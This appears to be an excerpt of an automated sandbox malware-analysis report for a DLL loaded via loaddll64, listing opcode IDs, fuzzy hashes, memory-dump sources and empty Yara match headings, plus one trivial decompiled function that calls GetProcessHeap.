                                                                                                      • Opcode ID: cd45515637f1f2b16c20ca83177dd82b64ca54d483ea71e032997c7aebad3db9
                                                                                                      • Instruction ID: 3bbf9db0e9f1f1cd2f3806796f1fd845787a3905c9f06ecb1b9c11751c7e15f2
                                                                                                      • Opcode Fuzzy Hash: cd45515637f1f2b16c20ca83177dd82b64ca54d483ea71e032997c7aebad3db9
                                                                                                      • Instruction Fuzzy Hash: 7291FA7150468DABDBBACF28DC9A7D937A0FB48344F90811AD90E8F290DF745B49DB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: XU
                                                                                                      • API String ID: 0-683303128
                                                                                                      • Opcode ID: e071b3a0d50c9461b57229d15226e783a6e60c7e98d42caa5a907250e51fd640
                                                                                                      • Instruction ID: 425e58cadb221d331942f6c121d336e4e4e9b3bb556196463e5803c943499b9b
                                                                                                      • Opcode Fuzzy Hash: e071b3a0d50c9461b57229d15226e783a6e60c7e98d42caa5a907250e51fd640
                                                                                                      • Instruction Fuzzy Hash: 10613B70D14608DBEB9CDFA4E8896DDBBB1FB48344F10812DE816E72A1DB749A49CF41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: F'K
                                                                                                      • API String ID: 0-2963079709
                                                                                                      • Opcode ID: 713e8163358f3e4ccf3a322240c7036fe92718bea1a19a215dd26039f06aebda
                                                                                                      • Instruction ID: 3cdbfef3d71ad5117e50a41d4a808b16c297a78b625f2c46d5022480677e20ff
                                                                                                      • Opcode Fuzzy Hash: 713e8163358f3e4ccf3a322240c7036fe92718bea1a19a215dd26039f06aebda
                                                                                                      • Instruction Fuzzy Hash: C481A5749043888BDBB9DF68C8897DDBBB0FB48348F20411EDC5AAB291DBB45685CF41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Gh
                                                                                                      • API String ID: 0-277699601
                                                                                                      • Opcode ID: 7940fb094068dd5baf5e4535b0b949c1577390b24490b32456d4c9773adc2951
                                                                                                      • Instruction ID: 49f89991b7669aef05847bf6ac8085ae3f2e5bccc0c70176600d3bb48f89c730
                                                                                                      • Opcode Fuzzy Hash: 7940fb094068dd5baf5e4535b0b949c1577390b24490b32456d4c9773adc2951
                                                                                                      • Instruction Fuzzy Hash: A2512670614B48ABDBC9DE28C4C669D3FE1FB483A8FA06028FC4786295D774D4C5CB81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: KdW
                                                                                                      • API String ID: 0-1553299040
                                                                                                      • Opcode ID: 3dbde57a559d0e97d3426f0fe397d2413bb4c768266781bd1ea48c4852796dec
                                                                                                      • Instruction ID: 07466cbb68b99a3b5ba183136cc33729b20d4f14bf8bba25a53fc7287070b877
                                                                                                      • Opcode Fuzzy Hash: 3dbde57a559d0e97d3426f0fe397d2413bb4c768266781bd1ea48c4852796dec
                                                                                                      • Instruction Fuzzy Hash: 17619EB090074A8BDF48CF28C49A59E7FB1FB68398F60421DFC5696290D374DAA5CBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 5
                                                                                                      • API String ID: 0-2458008916
                                                                                                      • Opcode ID: 3e00d75dc5af6ed95834cd7e36aa8dd6f7dfadaf5872006e22b3d5cd376261b0
                                                                                                      • Instruction ID: a26923ab85f7e808caed84009aa606e64988cd015e626ed89f9c8f152d3751bb
                                                                                                      • Opcode Fuzzy Hash: 3e00d75dc5af6ed95834cd7e36aa8dd6f7dfadaf5872006e22b3d5cd376261b0
                                                                                                      • Instruction Fuzzy Hash: FD51BEB090074E8BDB48CF64C88B5DE7FB0FB68398F20421DEC5696294D3B496A5CBC4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: >
                                                                                                      • API String ID: 0-260571596
                                                                                                      • Opcode ID: 52da228a42332ba98b714843feb8a4ffa7a865caa0d47f3da51bcc1adbe3605a
                                                                                                      • Instruction ID: 46fc6c4e0ac0a664899e95d82bf5bf8fb1e46c637e697bbd607199efc3ac47d3
                                                                                                      • Opcode Fuzzy Hash: 52da228a42332ba98b714843feb8a4ffa7a865caa0d47f3da51bcc1adbe3605a
                                                                                                      • Instruction Fuzzy Hash: E351187090070E8FDF48DF68C48A5DE7FB0FB58398F255219E80AA6260C7789695CFC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: e#y
                                                                                                      • API String ID: 0-1553523250
                                                                                                      • Opcode ID: 7cfc1742122b5da270b1305c98699770b0d8300b0d29b437b0f5bbbb71ff1cdb
                                                                                                      • Instruction ID: 8922a9c917ecf92f84784f2c0912e7afb41abd4682f2986cf207ea24a7e27a88
                                                                                                      • Opcode Fuzzy Hash: 7cfc1742122b5da270b1305c98699770b0d8300b0d29b437b0f5bbbb71ff1cdb
                                                                                                      • Instruction Fuzzy Hash: 4451C0B090034A8BDB48DF24C49A4DE7FB1BB68394F60461DEC56AA290D37896A5CBC4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;Qe+
                                                                                                      • API String ID: 0-3743842969
                                                                                                      • Opcode ID: abc73cde212dc252b0e5d03e266be842b85d1299fa2b3d615a0caa319cbc98b6
                                                                                                      • Instruction ID: 2891cc472bdff435687e8dc78c7f584053815dc88c3a0ad3e69441950bb252b7
                                                                                                      • Opcode Fuzzy Hash: abc73cde212dc252b0e5d03e266be842b85d1299fa2b3d615a0caa319cbc98b6
                                                                                                      • Instruction Fuzzy Hash: FB51B3B190074A8BDB48CF68C49A5DE7FB0BB68398F114229EC5696250D374DAA5CBC0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ,'
                                                                                                      • API String ID: 0-3722628154
                                                                                                      • Opcode ID: fb5c24a2de7b785ef7d1522db3a7cd1fc0c6d32909dcdfd4e7ef4007326c169e
                                                                                                      • Instruction ID: 8bcc0ae8ca8a44d8cc4a64df71be4da37ed53fd059e3607e1506b6ed9a83d4bd
                                                                                                      • Opcode Fuzzy Hash: fb5c24a2de7b785ef7d1522db3a7cd1fc0c6d32909dcdfd4e7ef4007326c169e
                                                                                                      • Instruction Fuzzy Hash: 9C51E3B091074A8FDB48CF68C9865DE7FB0FB68394F10421DEC5AA6290D37496A5CFC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;qct
                                                                                                      • API String ID: 0-1256533914
                                                                                                      • Opcode ID: 7e5896647748426d00c93f1e327efcd977346de81977c4c15da4b7b9c787c365
                                                                                                      • Instruction ID: 5c1d59b2199d0d85db2571b197c7ca3ede17e59358e5629c23b069c973ffe58b
                                                                                                      • Opcode Fuzzy Hash: 7e5896647748426d00c93f1e327efcd977346de81977c4c15da4b7b9c787c365
                                                                                                      • Instruction Fuzzy Hash: B741E27051078D8BDB49CF68C88A4DE7BA0FB4835CF155619FC8AA6260D3B8D585CF89
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %[
                                                                                                      • API String ID: 0-3862537531
                                                                                                      • Opcode ID: f1dc08e8e3e3301475fb70ff4cfa84bb86d735aa649ff25d3a10773117e6cde7
                                                                                                      • Instruction ID: 6a4ad4b0db03769040014b30bff45f2a66b5b8118bf8a9f7d20fa3eb207c29ac
                                                                                                      • Opcode Fuzzy Hash: f1dc08e8e3e3301475fb70ff4cfa84bb86d735aa649ff25d3a10773117e6cde7
                                                                                                      • Instruction Fuzzy Hash: 6E31D6B150478A8BDB4CDF68D8565AE3BB1FB48304F004A2DFD26DB390D7B49624CB94
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Wn
                                                                                                      • API String ID: 0-506041651
                                                                                                      • Opcode ID: 571cac09fbe3685261a59c499fbd8c80fdf8cf6d47964e918e1805a2c447958a
                                                                                                      • Instruction ID: 81acd842a4d7b99bb8f16045e05b91d2bb3390d65dcb5750e05b0634c9df5c42
                                                                                                      • Opcode Fuzzy Hash: 571cac09fbe3685261a59c499fbd8c80fdf8cf6d47964e918e1805a2c447958a
                                                                                                      • Instruction Fuzzy Hash: 5F41D4B050078A8FDF48CF68D89A5DE7BB1FB48348F104A2CEC6696290D3B4D664CBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "p
                                                                                                      • API String ID: 0-3060671971
                                                                                                      • Opcode ID: ae29b2ab0911a73132ecede333d1ad00ec6016c3b77c06c2e3197b8238caa4ac
                                                                                                      • Instruction ID: 6d64e93883db61d95f36b7a5a375b7ada03e85890cb65b9286afd9a0e7997e4a
                                                                                                      • Opcode Fuzzy Hash: ae29b2ab0911a73132ecede333d1ad00ec6016c3b77c06c2e3197b8238caa4ac
                                                                                                      • Instruction Fuzzy Hash: 42317EB190438E8FDB48DF68D85A5AE3BA0FB48344F014A1DEC269B354D7B4D664CBD4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 3k^)
                                                                                                      • API String ID: 0-3788653604
                                                                                                      • Opcode ID: bb4a256fcbfa579ec56a1ee2ed7beb19ee26f98eb9724182ed08b84c2a93462e
                                                                                                      • Instruction ID: 9f8dcddef577f6809e8fc1cb2f7e992fa0b5e1cd21e70ff7818dd4bfba9124f9
                                                                                                      • Opcode Fuzzy Hash: bb4a256fcbfa579ec56a1ee2ed7beb19ee26f98eb9724182ed08b84c2a93462e
                                                                                                      • Instruction Fuzzy Hash: B7417FB090474E8BDB44CF64C48A5CE7FB0FB68398F200619F859A6250D3B8D6A5CBD5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L>
                                                                                                      • API String ID: 0-3698593629
                                                                                                      • Opcode ID: 4505467bed29688f524a608710bc2007b6739dbdf074f8a934cd9a0936b0c64f
                                                                                                      • Instruction ID: d89d460aa873d83448a17f0a74045e6cf2e1d6238d53f49acea812bb04bd12ae
                                                                                                      • Opcode Fuzzy Hash: 4505467bed29688f524a608710bc2007b6739dbdf074f8a934cd9a0936b0c64f
                                                                                                      • Instruction Fuzzy Hash: C23193716183818BD748DF28D45652ABBE1FB8D30CF504B2DF8CAA7255D738D605CB4A
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4s
                                                                                                      • API String ID: 0-872399246
                                                                                                      • Opcode ID: 6d87eca2fd37755a10645a04d53ddd8ccaa51cb07cf26575bdb0066d7b11df8f
                                                                                                      • Instruction ID: eeb76c7ae662c84e9fd1594776157fcd1e0c77f05a4f9c485f3ea2b2cc7d31c8
                                                                                                      • Opcode Fuzzy Hash: 6d87eca2fd37755a10645a04d53ddd8ccaa51cb07cf26575bdb0066d7b11df8f
                                                                                                      • Instruction Fuzzy Hash: 314181B090474A8FDB48CF64D48A5DF7FB0FB68398F200519E859A62A0D378D6A4CFC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: &'
                                                                                                      • API String ID: 0-655172784
                                                                                                      • Opcode ID: 350a21f38a3fdb5f3133185a05ab1b6e8489f4d150297426f8e9146ad85da26a
                                                                                                      • Instruction ID: e60b1eca4cd057e5464165fc71d6e00ca11e6494182570a2c7a3ee484fb5e5db
                                                                                                      • Opcode Fuzzy Hash: 350a21f38a3fdb5f3133185a05ab1b6e8489f4d150297426f8e9146ad85da26a
                                                                                                      • Instruction Fuzzy Hash: DE3179755083818BD348DF28C55641ABBE1BBCC35CF805B2DE4CAAB3A4D778D605CB4A
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: `
                                                                                                      • API String ID: 0-1850852036
                                                                                                      • Opcode ID: 1919c1110502d15319449504d6e91b7fa88324414ab81abcf7b1c29e64ecc28d
                                                                                                      • Instruction ID: 12f27fef96dc8894754dd231533b976fb372cf9f09be1d3cddb09b50d4677c93
                                                                                                      • Opcode Fuzzy Hash: 1919c1110502d15319449504d6e91b7fa88324414ab81abcf7b1c29e64ecc28d
                                                                                                      • Instruction Fuzzy Hash: 2221267065DB449FE388DF29C48961BBAE1FBD8340F905A1EF885C2360C734D845CB42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: BsL
                                                                                                      • API String ID: 0-590970710
                                                                                                      • Opcode ID: 4c7ca18370d47a9c2cceab002f43e00c4595808ca112b21f17e8f3d7773031d4
                                                                                                      • Instruction ID: bf3e705d0a3e127a6b239d821588e89859f67f6db20862a07d3c8d6d25b0e04a
                                                                                                      • Opcode Fuzzy Hash: 4c7ca18370d47a9c2cceab002f43e00c4595808ca112b21f17e8f3d7773031d4
                                                                                                      • Instruction Fuzzy Hash: 41317DB1529780AFD3C8DF28C48691BBBE0FB89314F816A2DF9C586260D374D455CF02
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ZR
                                                                                                      • API String ID: 0-4130514108
                                                                                                      • Opcode ID: 6cbb8a842fd3cc15b819203d482a3a3b46369313eab12406f6265ee7f7ea0382
                                                                                                      • Instruction ID: b13af9977396cc860318babd94d7947ade869d3bdb5f1587fd609083ec60b6d4
                                                                                                      • Opcode Fuzzy Hash: 6cbb8a842fd3cc15b819203d482a3a3b46369313eab12406f6265ee7f7ea0382
                                                                                                      • Instruction Fuzzy Hash: 0B316EB052D780AFD388DF28C49691ABBE1FBC5315F806A1DF9968B350D774D445CB42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %F
                                                                                                      • API String ID: 0-915744445
                                                                                                      • Opcode ID: cf4e8b82da0d821891615694ed2d7715b09984878493b04af082e458cdddcb63
                                                                                                      • Instruction ID: f3632c01bd7492b9d648e83c8b8289f5be8476ad9f7b0aa526bfe9f17a615d29
                                                                                                      • Opcode Fuzzy Hash: cf4e8b82da0d821891615694ed2d7715b09984878493b04af082e458cdddcb63
                                                                                                      • Instruction Fuzzy Hash: A1317AB15087809BD348DF28D44A45ABBE1BB9C31CF414B1DF4CAAB254D3B9D608CF0A
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: >
                                                                                                      • API String ID: 0-1166260821
                                                                                                      • Opcode ID: 7fdb2c55224cd27c72bb618ee64ca03bed07baaed02b8a8707ebf8ca8fbe557d
                                                                                                      • Instruction ID: a3d582c264d7a48cbd0e974e941d71c0af5034fa157bb054186120ff964f1b5c
                                                                                                      • Opcode Fuzzy Hash: 7fdb2c55224cd27c72bb618ee64ca03bed07baaed02b8a8707ebf8ca8fbe557d
                                                                                                      • Instruction Fuzzy Hash: 4F316BB55083808FD788DF28D45941ABBE0BB9C358F404B2DF4CAA72A1D778DA45CF0A
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: -
                                                                                                      • API String ID: 0-524432557
                                                                                                      • Opcode ID: ab6574b7591fa644ef4a174e0089e3a7f2dde0b4bdacdeb17973816cbe5b2230
                                                                                                      • Instruction ID: 2743ae798d84361f3c47c0844efe4056bc1e573d44da25ce9fa5af028cbcbbd6
                                                                                                      • Opcode Fuzzy Hash: ab6574b7591fa644ef4a174e0089e3a7f2dde0b4bdacdeb17973816cbe5b2230
                                                                                                      • Instruction Fuzzy Hash: E22160B152D780AFD388DF29D18991BBBE0BB85344F806E1DF8C68B250D7B5D845CB46
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 9D
                                                                                                      • API String ID: 0-1055660748
                                                                                                      • Opcode ID: 7e3a213964b2efcfd3778a88dd8b399f98e251b5205d52f3c39e35f889fd4133
                                                                                                      • Instruction ID: 2b980fabc4745c60efad4018d3cdf33bc582eba9e1b676cceb4e0857b73aa84d
                                                                                                      • Opcode Fuzzy Hash: 7e3a213964b2efcfd3778a88dd8b399f98e251b5205d52f3c39e35f889fd4133
                                                                                                      • Instruction Fuzzy Hash: 6C2179B450C3858BD348DF28D14A51ABBE0BB9C70CF400B5DF8CAAB254D778D644CB0A
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ]i
                                                                                                      • API String ID: 0-2057496602
                                                                                                      • Opcode ID: 986d758f6ca8ef85e847a0378ae5df520f089d8d24386f824cd21791a7bd6731
                                                                                                      • Instruction ID: 4a116e0a0ac8943674a44645b40dd0a83197eee35043817acb7aa81aadce2f0a
                                                                                                      • Opcode Fuzzy Hash: 986d758f6ca8ef85e847a0378ae5df520f089d8d24386f824cd21791a7bd6731
                                                                                                      • Instruction Fuzzy Hash: 492154B45087858BD398DF28D48A50AFBE0BB9C318F400B1DF4C9A62A4D77DDA45CB0A
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: x{
                                                                                                      • API String ID: 0-1642613173
                                                                                                      • Opcode ID: 63a3ae9201259adcdbe27aaae2969a84c8f8b5356c3378407a4e6cf7a642a0a4
                                                                                                      • Instruction ID: cfab1a828be9d4f11d62def22584f191cf8c0c6105b21f987aeed96694dfa2d1
                                                                                                      • Opcode Fuzzy Hash: 63a3ae9201259adcdbe27aaae2969a84c8f8b5356c3378407a4e6cf7a642a0a4
                                                                                                      • Instruction Fuzzy Hash: 992126B55097849BE348DF28C08A51BBBE1BB9C31CF810B1DF4CAA7254D378D649CB4A
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00007FF87FF87C10DD90(long long __rax) {
                                                                                                      				signed int _t3;
                                                                                                      
                                                                                                      				_t3 = GetProcessHeap();
                                                                                                      				 *0x7c17f930 = __rax;
                                                                                                      				return _t3 & 0xffffff00 | __rax != 0x00000000;
                                                                                                      			}




                                                                                                      0x7ff87c10dd94
                                                                                                      0x7ff87c10dd9d
                                                                                                      0x7ff87c10ddab

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 54951025-0
                                                                                                      • Opcode ID: d636a00b42bd7fb21fd81f09ca247f2baf2d4d4e689b7af4b01eea6171bd139b
                                                                                                      • Instruction ID: d4d126298192fa8b749cdc209b48f5ac10471c6997a159863626a395c102b8c1
